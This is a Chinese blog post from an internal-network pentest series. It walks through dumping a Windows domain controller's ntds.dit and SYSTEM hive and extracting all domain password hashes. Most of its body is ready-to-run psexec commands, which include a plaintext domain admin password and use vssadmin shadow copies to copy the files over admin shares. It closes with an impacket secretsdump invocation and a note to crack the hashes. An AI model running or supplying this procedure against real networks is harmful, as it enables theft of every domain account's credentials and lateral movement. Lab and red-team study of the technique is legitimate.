内网安全:05.dump内网DC的ntds.dit,获取hash

叙述:有时候我们碰到一个内网环境,有DC的密码,于是使用这个方法,导出DC中所有内网主机的密码并破解

0x0 环境
DC:172.31.20.30  domain用户:pentest\administrator 密码:UFhae&pwL%F
内网主机A(win 2012):172.31.21.166
psexec: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
secretsdump:https://github.com/SecureAuthCorp/impacket/releases
0x1 使用psexec 导出加密后的ntds.dit
使用psexec 获取信息:
psexec /accepteula \172.31.20.30 -u pentest\administrator -p "UFhae&pwL%F" -h cmd /c "vssadmin create shadow /for=c: >> \172.31.21.166\c$\out.txt" #获取信息且输出到out.txt,成功

内网安全:05.dump内网DC的ntds.dit,获取hash

使用psexec 导出加密后的ntds.dit:
psexec /accepteula \172.31.20.30 -u "pentest\administrator" -p "UFhae&pwL%F" -h cmd /c "copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit \172.31.21.166\c$\"

内网安全:05.dump内网DC的ntds.dit,获取hash

使用psexec 导出加密后的system:
psexec /accepteula \172.31.20.30 -u "pentest\administrator" -p "UFhae&pwL%F" -h cmd /c "copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \172.31.21.166\c$\"

内网安全:05.dump内网DC的ntds.dit,获取hash

我们有了ntds.dit和system就可以解密了

0x2 解密ntds.dit和system
工具是:impacket里的secretsdump
我用的kali,这个工具windows也是支持的。。。。-------&bugfor首发:菊花槿&
kali先快速安装:
pip install .
然后把ntds.dit和system放到secretsdump.py一起执行:
secretsdump.py -ntds ntds.dit -system SYSTEM local

内网安全:05.dump内网DC的ntds.dit,获取hash

扫描后拿去解密hash即可:
内网安全:05.dump内网DC的ntds.dit,获取hash

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值